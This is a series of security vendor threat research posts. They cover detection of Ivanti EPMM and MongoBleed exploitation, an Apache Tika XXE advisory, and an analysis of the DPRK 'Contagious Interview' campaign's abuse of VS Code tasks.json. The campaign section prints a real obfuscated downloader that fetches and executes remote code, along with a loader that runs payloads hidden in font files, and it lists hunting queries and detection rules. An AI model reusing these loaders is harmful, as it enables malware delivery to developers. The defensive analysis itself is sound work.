Less work. Cleaner data. Better detections. Abstract is a security data pipeline with streaming-first detections built in. We process and analyze data in motion — reducing noise, lowering ingest costs, and enabling real-time detection with no SIEM rip-and-replace required.
In late January 2026, CISA added two critical vulnerabilities affecting Ivanti Endpoint Manager Mobile (EPMM) to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2026-1281 and CVE-2026-1340. These vulnerabilities affect the In-House Application Distribution and Android File Transfer Configuration features, both of which are being actively exploited in the wild.
Ivanti EPMM is a mobile device management (MDM) platform that manages smartphones, tablets, and mobile applications across enterprise fleets. Given EPMM's privileged position in managing mobile devices and the platform's history of exploitation throughout 2025, immediate action is critical.
Technical Details
CVE-2026-1281 and CVE-2026-1340 allow attackers to exploit EPMM through HTTP GET requests containing malicious bash commands as parameters. The attack targets specific endpoints:
/mifs/c/aftstore/fob/ (Android File Transfer)
/mifs/c/appstore/fob/ (Application Store)
Key Behavioral Signature:
Legitimate use of these features results in HTTP 200 response codes, while exploitation attempts against the endpoints above return HTTP 404 responses.
Detection therefore filters for 404 responses to the vulnerable endpoints while excluding legitimate localhost heartbeat traffic from patched systems.
Critical: On-box logging can be manipulated by attackers who successfully exploit the system. Organizations must review logs from a SIEM or centralized log aggregator, not from the EPMM server itself.
Affected Products
Vulnerable Versions:
Currently, specific version information is still being disclosed. Organizations should:
Assume all internet-facing EPMM instances are potentially vulnerable until patched
Review Ivanti's security advisory for confirmed version details
Apply available security updates immediately
Ivanti EPMM has been repeatedly targeted throughout 2025, with major campaigns by China-nexus APT groups compromising government, healthcare, financial services, and telecommunications sectors.
Indicators of Compromise
Organizations should immediately search Apache access logs for exploitation attempts:
Primary Detection Pattern:
404 responses to vulnerable endpoints from external IPs:
Key Advantage: Our detection operates on off-box logs forwarded to the Abstract Security platform, ensuring visibility even if attackers manipulate on-box logs after compromise.
If this detection triggers, immediately validate patch status, review source IPs, and search for GET requests containing bash commands.
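As an illustrative sketch of this kind of filter (the endpoint paths come from this advisory; the Apache combined-log parsing and the localhost exclusion are assumptions based on the behavior described above, not the production detection):

```javascript
// Illustrative sketch only: flags 404 responses to the vulnerable EPMM
// endpoints from non-localhost sources in Apache combined-format access logs.
// The log format and field positions are assumptions, not Ivanti's spec.
const VULNERABLE_PATHS = ['/mifs/c/aftstore/fob/', '/mifs/c/appstore/fob/'];

function isSuspicious(line) {
  // Apache combined log: IP ident user [time] "METHOD path PROTO" status size ...
  const m = line.match(/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})/);
  if (!m) return false;
  const [, srcIp, method, path, status] = m;
  // Exclude localhost heartbeat traffic from patched systems
  if (srcIp === '127.0.0.1' || srcIp === '::1') return false;
  return method === 'GET' &&
         status === '404' &&
         VULNERABLE_PATHS.some(p => path.startsWith(p));
}
```

Hits from this kind of filter would then feed the triage steps above: validate patch status, review source IPs, and inspect the matching requests for bash commands in parameters.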
Recommendations
Immediate Actions:
Apply security patches - Check Ivanti's advisory and patch immediately
Search access logs - Use the regex above to identify exploitation attempts in SIEM/log aggregator
Isolate unpatched systems - Remove from internet if patching cannot be done immediately
Enable off-box log forwarding - Configure real-time Apache log forwarding to a SIEM
Rotate credentials - Change all administrative passwords and service account credentials
Detection and Monitoring:
Implement automated monitoring for the detection regex pattern
Deploy alerts for GET requests with bash commands in parameters
Enable comprehensive logging with real-time off-box forwarding
Establish 24/7 monitoring for EPMM platforms
Verify log integrity monitoring to detect tampering
Risk Assessment:
Identify all EPMM deployments, including forgotten or shadow IT instances
Determine which instances are internet-accessible
Evaluate cloud integration and identify stored access tokens
Review network segmentation and implement stricter controls
Response Planning:
Develop incident response procedures for EPMM compromise scenarios
Establish communication channels for escalation
Plan for complete server rebuild if compromise is detected
Coordinate with Ivanti support for incident response assistance
Conclusion
CVE-2026-1281 and CVE-2026-1340 represent critical threats to organizations using Ivanti EPMM. The distinctive 404 response signature provides clear detection opportunities, but organizations must act immediately to:
Apply available patches
Search access logs for exploitation attempts using the provided regex
Implement off-box log forwarding and monitoring
Isolate unpatched systems
Conduct forensic reviews if exploitation is detected
CISA's KEV catalog inclusion signals active exploitation is occurring now. Successful compromise provides attackers with control over entire mobile fleets, access to cloud service tokens, and the ability to bypass multi-factor authentication.
Abstract Security customers benefit from real-time detection operating on off-box logs, providing immediate visibility into exploitation attempts with automatic finding creation and MITRE ATT&CK context.
Organizations should not wait; every hour of delay increases the risk of compromise.
Contagious Interview: Tracking the VS Code Tasks Infection Vector
Executive Summary
The DPRK-attributed Contagious Interview campaign continues to target software developers through fake recruitment schemes disguised as technical assessments and code reviews of projects hosted on platforms like GitHub. A relatively new technique in the campaign's arsenal leverages Microsoft Visual Studio Code task files (located at .vscode/tasks.json) to achieve malicious code execution upon project open. This report documents our observations tracking this vector, presents GitHub-based discovery methods, highlights unique findings including a newly published malicious Node Package Manager (NPM) package, and outlines detection opportunities for defenders.
Background
Recent reporting from the security community has documented the campaign's adoption of VS Code task files as an infection vector, ultimately leading to deployment of the BeaverTail downloader and InvisibleFerret backdoor:
Open Source Malware documented various types of repos containing malicious tasks files, associated "code puppets", and a marked reliance on Vercel domains for payload hosting.
Red Asgard published detailed C2 infrastructure analysis and some interesting results from probing the infrastructure.
Security Alliance (SEAL) provided a comprehensive breakdown of the attack's malware infection chain.
Earlier work from NVISO documented the campaign's use of legitimate JSON storage services for payload staging, a technique that remains in active use alongside the VS Code tasks vector.
This report builds on that foundation with additional observations from our tracking efforts.
The VS Code Tasks Vector
How It Works
Visual Studio Code's Task feature allows developers to automate workflows and run tools without manual interaction. Tasks are configured in the .vscode/tasks.json file for a workspace. The most important facilitator for this attack vector is the configuration's runOptions property, which supports a runOn value of folderOpen, causing the defined task to execute automatically when a workspace is opened. This is intended to streamline developer workflows like starting build watchers, linters, or development servers when a project opens.
Contagious Interview actors exploit this by including malicious shell commands in tasks.json files. When a victim clones a repository to their local machine and opens it in VS Code, the malicious task executes and kicks off the infection chain leading to malware installation. Furthermore, the presentation property among others in tasks.json can be configured to hide the shell activity entirely, leaving the victim unaware that anything executed at all.
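As a defanged illustration of the structure involved (the label, command, and property values here are hypothetical; real samples replace the echo with a download-and-execute one-liner), a tasks.json abusing this feature might look like:

```json
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build-setup",
      "type": "shell",
      "command": "echo placeholder-for-malicious-download-and-execute",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": {
        "reveal": "never",
        "echo": false,
        "panel": "dedicated",
        "close": true
      }
    }
  ]
}
```

The `runOn: folderOpen` setting triggers the task when the workspace opens, while the `presentation` block suppresses the terminal output that would otherwise reveal execution.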
This image breaks down the tasks configuration properties quite well (ref. pcaversaccio):
A Tiny, Tiny Silver Lining...
One might be somewhat relieved to know that task execution requires the victim to trust the workspace when prompted. However, this trust prompt is a single click away from compromise, and social engineering ("please follow the setup instructions exactly") is often sufficient to convince targets in the context of a job interview. Notably, once a workspace is trusted the user is never prompted again, establishing persistence for malware installation on subsequent project opens.
Additionally, a project doesn't necessarily have to start off with malicious tasks embedded; subsequent pulls containing newly added malicious tasks will execute without re-prompting. An attacker who controls or gains commit access to a previously trusted repository could push malicious changes that execute silently the next time a collaborator opens the project. This extends the threat model beyond cloning unfamiliar repositories to include ongoing collaboration with compromised projects.
Continuity with Existing Techniques
While the tasks.json vector is a newer addition to the campaign's toolkit and a marked move away from reliance on ClickFix for initial infection, it integrates with previously documented Contagious Interview techniques:
Obfuscated JavaScript payloads executed via Node.js
Payloads masquerading as non-JavaScript files (fonts, images, configuration files)
Hosting payload servers on web application platforms (Vercel, Render)
Staging on JSON storage sites (JSON Keeper, JSON Silo, and npoint.io)
Malicious NPM package dependencies
The tasks.json file serves as the trigger mechanism, while downstream payload delivery mirrors patterns documented by the research community over the past year.
The earliest public POC of this VS Code backdoor technique appears in this VS Code-Backdoor repository from researcher SaadAhla.
Tracking Activity with GitHub Code Search
GitHub Code search provides an effective mechanism for identifying repositories using this technique. We developed several queries to surface malicious tasks.json files and track campaign activity.
Finding Tasks.json with Downloaders
This query identifies repositories containing tasks.json files with commands directly running curl or wget to fetch and immediately execute payloads.
path:tasks.json runOn folderOpen (curl OR wget) (cmd OR "| sh")
Most tasks cover both Windows and Unix-like platforms. Here are some command samples:
This surfaces new repositories from known personas (puppet GitHub user accounts associated with Contagious Interview activity), identifies new personas using similar techniques, and reveals variations in implementation. However, it does not capture everything. Some tasks.json commands execute payloads stored elsewhere in the repository or trigger infections through malicious package installations rather than direct downloads.
An Amusing Evasion Technique
While reviewing search results, we noticed several tasks.json files' commands appeared empty at first glance, but a horizontal scroll bar hinted at content extending beyond the visible window.
Scrolling right revealed the malicious commands padded with whitespace to push them far off the right edge of the screen, presumably to hide them from cursory manual review. These are easily missed unless a user notices the horizontal scroll bar.
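A simple heuristic catches this padding trick; this is a sketch under assumptions (the 200-character threshold is arbitrary, and real review tooling would parse the full tasks.json rather than a lone command string):

```javascript
// Flags task command strings that hide content behind long runs of
// whitespace, as in the padded tasks.json files described above.
// The 200-character threshold is an arbitrary assumption.
function hasWhitespacePadding(command, threshold = 200) {
  const runs = command.match(/\s{2,}/g) || [];
  return runs.some(run => run.length >= threshold);
}
```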
Existing reporting often highlights Vercel domain abuse, and for good reason as it's a consistent pattern in this campaign evolution. However, we observe that non-Vercel domains are also used, revealed by excluding "vercel" from our search:
path:tasks.json runOn folderOpen (curl OR wget) (cmd OR "| sh") NOT vercel
This query finds malicious tasks.json files not using Vercel domains, surfacing outliers. Note that this can include false positive results and should be reviewed.
The search revealed the following additional payload hosting domains, all of which appear in recently created or updated repositories as of the time of this analysis.
www[.]vscodeconfig[.]com
www[.]regioncheck[.]xyz
vscode-load[.]onrender[.]com
Payload Masquerading in Image, Font, and Text Files
Fake Spellcheck
One tasks file using regioncheck[.]xyz, in the repo ta3pks/Decentralized-Social, shows Node executing a .vscode/spellright.dict file:
The spellright.dict file appears to be a dictionary for the Spell Right VS Code extension. Spoiler: it's obfuscated JavaScript. Node.js doesn't care about file extensions; it will execute JavaScript from a .dict file without complaint.
Hunting for Tasks Executing Image and Font Files
This GitHub Code search surfaces tasks.json commands using node to execute JavaScript hidden in image and font files (add extensions as needed, or look for NOT .js to catch more variations). Again, mind the false positives in the results.
path:tasks.json runOn folderOpen node (.woff OR .svg OR .jpeg OR .png)
These all contain obfuscated JavaScript, such as in this webfonts/fa-brands-regular.woff2.
From a detection perspective, commands like node webfonts/fa-brands-regular.woff2 initially seem straightforward to catch, but there are variations to consider. For example, this sample checks for Node.js availability before execution:
We noticed that these tasks.json files often contained "label": "eslint-check". Using that label in this search returned the same results along with new variants.
"h=require('https');(async()=>{try{u=Buffer.from('aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9RSlpDRw==','base64')+'';d=await new Promise((r,j)=>{h.get(u,s=>{b='';s.on('data',c=>b+=c).on('end',()=>r(JSON.parse(b)));}).on('error',j);});new Function('require',Buffer.from(d.model,'base64')+'')(require);}catch(e){}})();"
]
...
This downloads and executes the next stage from a JSON Keeper URL - https://www[.]jsonkeeper[.]com/b/QJZCG. The response content was captured using URLScan: hxxps://urlscan[.]io/dom/019bdb75-40cb-7548-abd5-4558496217d5/ (Warning: this is an actual malicious payload. Handle with caution.)
Variant 2
chocoscoding/hmmm/.vscode/tasks.json supposedly runs JavaScript from a fake CSS file. However, while this project shares similarities with other Contagious Interview repositories, the referenced CSS file currently appears benign.
These are interesting because conf.js is used to indirectly run payloads stored in other files, somewhat less obvious than previous cases. Take this example from diemlibre-finance/evm01-66-release/server/config/conf.js:
new Function('require','module','exports','__filename','__dirname', src)(
require,
module,
exports,
__filename,
__dirname
);
This script extracts hex-encoded JavaScript from webfonts/fa-brands-regular.woff2, decodes it, and executes it using the Function constructor. As expected, the font file contains the obfuscated payload.
Hunting for Obfuscated Payloads Directly
The observed JavaScript obfuscation patterns can be used to hunt for similar masquerading files in GitHub Code Search independent of tasks.json. Note that these searches return many results that aren't necessarily part of the Contagious Interview campaign, so manual review is required to determine attribution.
Hunting hexadecimal entity names in WOFFs and SVGs
(path:woff OR path:*svg) AND /[^a-zA-Z0-9]_0x[a-f0-9]{6}[=,\(\)\[\]\{\}]/
Hunting using commonly seen keywords
Obfuscation patterns change. Trying different search approaches, such as queries based on commonly seen strings, uncovers additional samples:
(path:woff OR path:*svg) AND fromcodepoint AND length AND undefined AND push AND 0x
Malicious NPM Package Installation Variant
One repository presenting itself as a "Food Ordering Web App Technical Assessment (MERN Stack)" takes a different approach. Rather than executing payloads directly from tasks.json, it triggers NPM installation of a malicious package dependency.
The tasks.json makes use of args like so to run npm install and start a backend server.
The backend/package.json includes:
The package name "jsonwebauth" sounds plausible, but code in backend/server.js reveals an inconsistency: the jsonwebauth package is imported as dotenv and used as Express middleware. Neither makes sense for a supposed JWT library, and both raise suspicion.
const express = require('express');
const dotenv = require('jsonwebauth');
const cors = require('cors');
require('dotenv').config();
const { connectDB } = require('./config/db.js');
...
// app config
const app = express();
const port = 4000;
// middleware
app.use(express.json());
app.use(cors());
app.use(dotenv());
// db connection
connectDB();
...
The Malicious Package "jsonwebauth"
The jsonwebauth package on npm was published on January 8, 2026, just days prior to our analysis. The package page has inconsistencies typical of malicious packages published by the Lazarus Group for the Contagious Interview campaign.
Upon cursory review in the Code tab, the lib folder weighs in at 380 kB, well above the sizes of other files and folders.
Within it, the file lserver.js (326 kB) contains the malicious payload.
This package is tracked on the DPRK npm packages tracker as part of the Contagious Interview campaign.
Searching GitHub for repositories using this package returns 2 additional results:
path:package.json jsonwebauth
Bonus: Hardcoded Database Credentials
The same repository contains a MongoDB connection string with hardcoded credentials under backend/config/db.js:
The unique username dulanjalisenarathna93 itself can be used to track other repositories using the same database or potentially associated with the campaign.
Finding Activity Through Commit Authors
Many of the personas that own malicious repositories or have committed to them can be leveraged to map out undiscovered repositories. However, their commit histories are often extensive and not always for files of interest like tasks.json.
We've found that searching for commits from git commit authors who have no linked GitHub account tends to yield less noisy results. In these examples, we search for commit author emails associated with personas that have made commits to tasks.json files in other malicious repositories. These return highly relevant results.
Compare that to author-name:"yosket" (a deleted GitHub persona associated with many commits to Contagious Interview repositories) which returns a whopping 3.5k results.
Note that these commit emails are arbitrary and cannot necessarily be used to identify real users. Rather they serve as pivot points for tracking repositories through commit histories. These emails may be throwaway or stolen addresses used only for git commits.
Mitigations
Disable automatic task execution. Set task.allowAutomaticTasks to off in VS Code user settings. This prevents tasks with runOn: folderOpen from executing without explicit user action.
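In user settings JSON, this looks like:

```json
{
  "task.allowAutomaticTasks": "off"
}
```

With this set, tasks configured with `runOn: folderOpen` require explicit user action (e.g., running the task manually) before they execute.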
Use GitHub's web editor for initial review. Pressing the "." key on any GitHub repository opens a browser-based VS Code environment at github.dev. This environment has no shell capability, allowing safe inspection of repository contents including .vscode/tasks.json files.
Avoid opening unfamiliar repositories in VS Code Desktop. Repositories received as part of job interviews or technical assessments carry elevated risk. If you must open such repositories in VS Code Desktop, check first in-browser for a .vscode/tasks.json file set to execute commands automatically on folder open, and do not trust the workspace when prompted.
Consider the broader attack surface. The VS Code tasks vector is one of many. From malicious npm packages to yet-unknown techniques, there are too many risks with opening unfamiliar repositories in VS Code. When possible, use sandboxed environments or browser-based tools for initial review.
Detection Opportunities
VS Code child process activity. Monitor for VS Code spawning child processes running curl, wget, powershell, bash, cmd, or similar utilities shortly after process start.
Node.js executing non-JavaScript files. Alert on Node.js executing files with unexpected extensions such as .woff, .woff2, .svg, .jpeg, .png, .dict, .npl, or other non-JS extensions.
VS Code tasks initiating requests to Vercel domains. Monitor for VS Code process starts followed closely by network requests to Vercel domains.
Platform-specific URL patterns. Requests to Vercel URLs containing platform indicators in the path (/linux, /mac, /windows) combined with query parameters (flag=, token=).
JSON storage and paste site access. Requests from non-browser processes to JSON storage URLs (jsonkeeper[.]com, jsonsilo[.]com, api[.]npoint[.]io) and paste sites (pastebin[.]com).
Conclusion
The Contagious Interview campaign's adoption of VS Code task files represents a pragmatic evolution in initial access techniques. By exploiting a legitimate IDE feature designed for developer productivity, threat actors achieve code execution and persistence with minimal user interaction, requiring only that the victim trust a workspace.
GitHub Code Search provides an effective mechanism for tracking campaign activity, identifying new repositories, and discovering technique variations. The queries and methodologies outlined here support ongoing monitoring.
Defenders should implement the mitigations and detection opportunities outlined in this report. Developers should exercise caution when opening repositories from unfamiliar sources, particularly those presented as part of recruitment processes.
With the recent publicizing of the MongoBleed vulnerability (CVE-2025-14847), many security organizations will inevitably be scrambling to understand what log visibility is available to them to detect and respond to MongoDB related security incidents.
Historically speaking, MongoDB logging has been a bit of a double-edged sword. On the one hand, it is possible to turn on very verbose debug logging to enable visibility of some of these interesting events. On the other hand, in production systems these logs can be quite voluminous, and enabling too much debug logging on high-throughput systems can degrade performance, so understanding what is available and what is required to satisfy your visibility requirements is paramount.
The good news is that if you are using the Abstract Security platform as a security data pipeline, MongoDB logs can be quickly and easily aggregated to greatly lower the total cost for signaling effectively on this important log source.
While we’ll reference Abstract where it’s illustrative, this post is not a walkthrough of platform features. The goal is to give security teams a clear mental model for MongoDB logging, attack-driven log volume, and how to reason about signal versus noise in any environment.
Due to the nature of the MongoBleed attack, tens of thousands of packets must be sent back and forth to the MongoDB server to effectively scrape useful data out of memory. This creates huge headaches for security teams, because to effectively signal on the command debug data enabled by the logComponentVerbosity parameter, you must open the MongoDB log floodgates.
When we tested ingesting this data into the Abstract Security platform and enabled our default MongoDB aggregation with zero tuning whatsoever, we saw an 85%+ decrease in MongoDB logs out of the box.
16,604 logs were shrunk to 2,427 events, with some logs aggregated at ratios as high as 7,067:1, using only a 1-minute aggregation window.
With further configuration and tuning, dropping log events which have little or no security value, it’s highly likely that some organizations will see > 90% reduction in logs, while still being able to effectively signal against the data.
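A minimal sketch of this kind of windowed aggregation (the grouping keys and 1-minute window follow the description above; this is an illustration, not Abstract's actual pipeline):

```javascript
// Illustrative sketch: collapse MongoDB JSON log lines into per-minute
// aggregates keyed by message, error name, and source IP. Field names
// follow the mongod log samples in this post.
function aggregate(logs) {
  const buckets = new Map();
  for (const log of logs) {
    const minute = log.t.$date.slice(0, 16); // e.g. "2025-12-27T20:04"
    const attr = log.attr || {};
    const srcIp = (attr.remote || '').split(':')[0];
    const key = [minute, log.msg, attr.errName || '', srcIp].join('|');
    const bucket = buckets.get(key) || { key, count: 0, sample: log };
    bucket.count += 1;
    buckets.set(key, bucket);
  }
  return [...buckets.values()];
}
```

Each output event keeps one sample log plus a count, preserving the source IP and error details while discarding thousands of near-duplicate lines.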
Here is an example of a low-value raw command error log, of which the default MongoBleed attack generated over 8,000:
{
"t":{
"$date": "2025-12-27T20:04:06.437+00:00"
},
"s": "D1",
"c": "COMMAND",
"id": 21963,
"ctx": "conn6",
"msg": "Assertion while parsing command",
"attr":{
"error": "InvalidBSON: BSON object not terminated with EOO in element with field name '?' in object with unknown _id"
}
}
These logs aren’t particularly useful and can be dropped entirely without losing security visibility: they contain no source IP address. The corresponding connection log holds the actually valuable information, including the source IP address and other details regarding the query:
{
"t":{
"$date": "2025-12-27T20:04:06.437+00:00"
},
"s": "I",
"c": "COMMAND",
"id": 51803,
"ctx": "conn6",
"msg": "Slow query",
"attr":{
"type": "none",
"isFromUserConnection": true,
"ns": "",
"collectionType": "none",
"numYields": 0,
"ok": 0,
"errMsg": "BSON object not terminated with EOO in element with field name '?' in object with unknown _id",
"errName": "InvalidBSON",
"errCode": 22,
"reslen": 180,
"locks":{},
"cpuNanos": 109443,
"remote": "172.19.0.1:60488",
"numInterruptChecks": 0,
"queues":{
"ingress":{},
"execution":{}
},
"workingMillis": 0,
"durationMillis": 0
}
}
Aggregating these “Slow query” events, while keeping useful information such as the source IP address, message and error message, provides tremendous signaling value without having to waste resources on processing low value log data.
Furthermore, this logging is useful beyond security. Monitoring for “Slow query” events within MongoDB can help tune your application or system to keep the database operating optimally, making it valuable to SRE and security teams alike.
Recommendations
Databases within organizations will remain targets for attackers for the foreseeable future. These systems are often the source of truth within organizations, and as such should be treated as first class citizens when it comes to health monitoring, logging, threat detection, and incident response. Prioritizing the ingestion of these critical data sources remains at the forefront of the observability and DFIR space.
Conclusion
To successfully detect MongoDB systems being abused, both by MongoBleed and other attack vectors, some form of event firehose must be enabled. Some teams may only have the ability to enable network level logging and will need to deduce which systems trigger volumetric anomalies within their environment. Others will be able to use the native MongoDB logComponentVerbosity parameter to enable logs required to effectively defend their MongoDB instances.
In either case, simply turning on these massive feeds and logging everything will prove both costly and resource intensive. Effectively managing your security data pipelines to greatly reduce the total amount of ingested data required to make an informed decision or assertion will help your security teams triage and respond to the latest threats effectively, both now and in the future.
We don’t know when the next huge vulnerability will become public and require onboarding new data sources so teams can effectively defend their estate. When it does happen, Abstract Security will be there to help our customers separate the signal from the noise, making the big picture clearer so your teams can act swiftly, safely and confidently.
Abstract Security Threat Research Organization (ASTRO)
Shortly before Christmas 2025, security researcher Joe Desimone disclosed CVE-2025-14847, a high-severity memory disclosure vulnerability in MongoDB Server rated CVSS 8.7. The vulnerability, dubbed "MongoBleed", affects MongoDB Servers when zlib network message compression is enabled.
The attack vector is unauthenticated and remote, requiring only the processing of a specially crafted compressed message to achieve exploitation. Given MongoDB's widespread use in web applications, content management systems, and backend services, the potential impact spans numerous industries including finance, healthcare, government, and technology sectors.
Technical Details
As discussed by Ox Security here, the vulnerability stems from improper handling of length parameter inconsistencies in zlib-compressed protocol header parsing within MongoDB Server.
Many applications expose MongoDB ports to internal networks or, in misconfigured environments, directly to the internet. In both scenarios, simply sending malicious compressed messages is sufficient to trigger the vulnerability, with no user interaction or authentication beyond network access required.
Furthermore, if default command-line parameters are used, there won’t be any visibility of the attack within MongoDB audit logs. Detecting this effectively entails either an Intrusion Detection System (IDS) monitoring traffic to and from the affected MongoDB server, or enabling MongoDB command logging. To enable MongoDB command logging, which will surface BSON parsing errors and slow queries, add the following to your MongoDB startup configuration:
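One way to raise command verbosity (a sketch; verify the exact syntax against your MongoDB version's documentation) is via the systemLog component settings in mongod.conf, which is equivalent to setting logComponentVerbosity for the command component:

```yaml
# mongod.conf -- raise COMMAND component verbosity to debug level 1 (D1)
# so BSON parsing assertions and slow-query details are logged.
# Verify against your MongoDB version's documentation before deploying.
systemLog:
  component:
    command:
      verbosity: 1
```

The same effect can be achieved at runtime with `db.adminCommand({ setParameter: 1, logComponentVerbosity: { command: { verbosity: 1 } } })`, without restarting mongod.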
This will show you BSON parsing and assertion errors which can be triaged and responded to:
{
"t":{
"$date": "2025-12-27T18:01:10.195+00:00"
},
"s": "I",
"c": "COMMAND",
"id": 51803,
"ctx": "conn8159",
"msg": "Slow query",
"attr":{
"type": "none",
"isFromUserConnection": true,
"ns": "",
"collectionType": "none",
"numYields": 0,
"ok": 0,
"errMsg": "incorrect BSON length in element with field name 'a' in object with unknown _id",
"errName": "InvalidBSON",
"errCode": 22,
"reslen": 166,
"locks":{},
"cpuNanos": 113281,
"remote": "172.19.0.1:51379",
"numInterruptChecks": 0,
"queues":{
"ingress":{},
"execution":{}
},
"workingMillis": 0,
"durationMillis": 0
}
}
In addition to the “Slow query” logs, which will be very numerous from the attacking source IP, there will also be error logs with the msg value “Assertion while parsing command”:
{
"t":{
"$date": "2025-12-27T18:01:10.198+00:00"
},
"s": "D1",
"c": "COMMAND",
"id": 21963,
"ctx": "conn8160",
"msg": "Assertion while parsing command",
"attr":{
"error": "InvalidBSON: incorrect BSON length in element with field name 'a' in object with unknown _id"
}
}
The barrage of “Slow query” MongoDB log messages currently appears to be the most valuable MongoDB signal, as these logs also contain the source IP address and port of the attacker. A default MongoBleed attack generated over 8,000 of each of these log lines.
Note that incident responders may require firewall or other network logs to tie the source connection information to the actual attacker when network address translation (NAT) is involved.
Affected Products
Vulnerable Versions:
The vulnerability affects multiple versions of MongoDB Server dating back to version 3.6:
MongoDB < 8.2.3
MongoDB < 8.0.17
MongoDB < 7.0.28
MongoDB < 6.0.27
MongoDB < 5.0.32
MongoDB < 4.4.30
MongoDB 4.2 – all versions, no fix available
MongoDB 4.0 – all versions, no fix available
MongoDB 3.6 – all versions, no fix available
Patched Versions:
MongoDB 8.2.3+
MongoDB 8.0.17+
MongoDB 7.0.28+
MongoDB 6.0.27+
MongoDB 5.0.32+
MongoDB 4.4.30+
Indicators of Compromise
Organizations should create mechanisms to centralize MongoDB command error logging and use that to triage large spikes (>1k) in “Slow query” messages, which could indicate MongoBleed is being used against the affected system. The presence of hundreds or thousands of “InvalidBSON: incorrect BSON length in element with field name” errors is also highly indicative of intentional BSON tampering, which could lead to sensitive information disclosure.
When the MongoBleed attack was run against a vulnerable server for testing, by default it generated over 8k “Slow query” log messages. Spikes of this log message over 1k should be triaged and investigated immediately.
Attack Signatures & Log Search Queries:
Large spike (>1k) of “Slow query” msg with errMsg containing “incorrect BSON length in element with field name”
Large spike (>1k) in errCode = 22
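A sketch of this spike check over mongod JSON logs (the 1,000 threshold comes from this post; field names follow the log samples above; how logs are collected and windowed is left to your pipeline):

```javascript
// Counts "Slow query" InvalidBSON logs per source IP and returns any
// source exceeding the spike threshold described above.
function bsonSpikeSources(logs, threshold = 1000) {
  const counts = new Map();
  for (const log of logs) {
    if (log.msg !== 'Slow query') continue;
    const attr = log.attr || {};
    if (attr.errName !== 'InvalidBSON' || attr.errCode !== 22) continue;
    const srcIp = (attr.remote || 'unknown').split(':')[0];
    counts.set(srcIp, (counts.get(srcIp) || 0) + 1);
  }
  return [...counts].filter(([, n]) => n > threshold).map(([ip]) => ip);
}
```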
Post-Exploitation Indicators:
CPU and memory contention from a large spike in malformed requests
Large amounts of data being requested from an IP which has not authenticated successfully
Organizations identifying these indicators should immediately initiate incident response procedures and conduct comprehensive mitigation and forensic analysis.
Recommendations
Organizations using MongoDB should take immediate action to patch this critical vulnerability.
Immediate Actions:
Upgrade MongoDB to patched versions referenced in the Patched Versions section
Enable command error logging to be able to detect suspicious and malicious MongoDB queries
Risk Assessment:
Identify all MongoDB deployments and ensure they have proper logging and network IDS visibility enabled
Review network segmentation to determine if MongoDB instances can be segmented further
Immediate Workarounds (if patching is not immediately feasible):
Disable ZLIB compression support from within MongoDB until a patch can be applied
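One way to implement this workaround is through mongod's network compression settings. A hedged sketch of a `mongod.conf` fragment that removes zlib from the negotiated wire-protocol compressors (leaving snappy and zstd); verify the option name and accepted values against your MongoDB version's documentation before deploying.

```yaml
# mongod.conf fragment: exclude zlib from wire-protocol compression.
# net.compression.compressors takes a comma-separated list;
# the value "disabled" turns compression off entirely.
net:
  compression:
    compressors: snappy,zstd
```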
Detection and Monitoring:
Enable comprehensive logging for MongoDB command errors, including full command payloads where feasible.
Implement real-time monitoring for large error spikes (>1k “Slow query” logs) on MongoDB systems
Correlate “Slow query” logs with upstream network traffic to ensure rapid mitigation for ongoing attacks
Response Planning:
Prepare incident response procedures for potential exploitation, including system isolation steps and forensic log collection requirements.
Consider implementing defense-in-depth measures, including Intrusion Detection Systems (IDS) with volumetric detection rules covering database traffic, though these should not replace patching.
Conclusion
CVE-2025-14847 represents a high-severity vulnerability in MongoDB, a very widely deployed database. With unauthenticated remote exploitation, this vulnerability demands immediate attention from every organization using MongoDB.
Ensuring that your MongoDB deployment has appropriate network segmentation is paramount to reducing the attack surface for this exploit. Validating that only required systems have network access to your MongoDB instances will significantly reduce exposure to exploitation.
In addition, where possible, command-level debug logging should be enabled.
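A hedged sketch of the relevant `mongod.conf` settings: `systemLog.component.command.verbosity` raises log detail for the command subsystem only, keeping global verbosity at its default. Confirm against your version's documentation, since higher verbosity increases log volume.

```yaml
# mongod.conf fragment: debug-level logging for the command
# component only; global verbosity stays at its default.
systemLog:
  component:
    command:
      verbosity: 1
```

The runtime equivalent from mongosh is `db.setLogLevel(1, "command")`, which applies without a restart but does not persist across restarts.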
In doing so, security teams gain clear visibility into both performance issues and exploitation attempts through the distinctive InvalidBSON errors generated during attacks. Combined with network flow analysis for connection-anomaly detection, organizations can build robust detection capabilities for this vulnerability class.
The logging configuration described here balances detection fidelity with operational overhead, providing the specific visibility needed to detect this threat. With proper use of security data pipelines, many of these log messages can be aggregated into high-fidelity visibility without consuming large quantities of disk space or bogging down your security teams.
Appendix A
Example logs from MongoDB with MongoBleed being run against it.
Abstract Security Threat Research Organization (ASTRO)
Critical Apache Tika Vulnerability: CVE-2025-66516 Enables XXE Injection
Background
On December 4, 2025, the Apache Software Foundation disclosed CVE-2025-66516, a critical XML External Entity (XXE) injection vulnerability in Apache Tika rated CVSS 10.0. The vulnerability affects multiple core components of Apache Tika, including tika-core (versions 1.13-3.2.1), tika-pdf-module (versions 2.0.0-3.2.1), and tika-parsers (versions 1.13-1.28.5).
This advisory expands upon the previously disclosed CVE-2025-54988 (CVSS 8.4) from August 2025, clarifying the full scope of affected artifacts. While the original report identified the PDF parser module as the entry point, the underlying vulnerability and its fix reside in tika-core, meaning organizations that only patched the PDF module remain vulnerable.
The attack vector is unauthenticated and remote, requiring only the processing of a specially crafted PDF file to achieve exploitation. Given Apache Tika's widespread use in document processing pipelines, search indexing systems, content analysis platforms, and security tools, the potential impact spans numerous industries including finance, legal, government, and media sectors.
Technical Details
The vulnerability stems from improper XML entity processing in Apache Tika's handling of XFA (XML Forms Architecture) content embedded within PDF documents. XFA is an XML-based specification used to define form elements and data within PDFs, and Tika parses this content during document analysis and metadata extraction.
An attacker can craft a malicious PDF containing XFA data with external XML entity references. When Tika processes this document, it resolves these external entities without proper validation, enabling several attack vectors. The attacker can read arbitrary files from the server filesystem, potentially accessing sensitive configuration files, credentials, or application data. Additionally, the vulnerability enables Server-Side Request Forgery (SSRF) attacks, allowing the attacker to probe internal networks, access cloud metadata services, or interact with internal APIs not exposed to the internet. In resource-constrained environments, the exploitation can cause Denial of Service through entity expansion attacks that consume excessive memory or CPU.
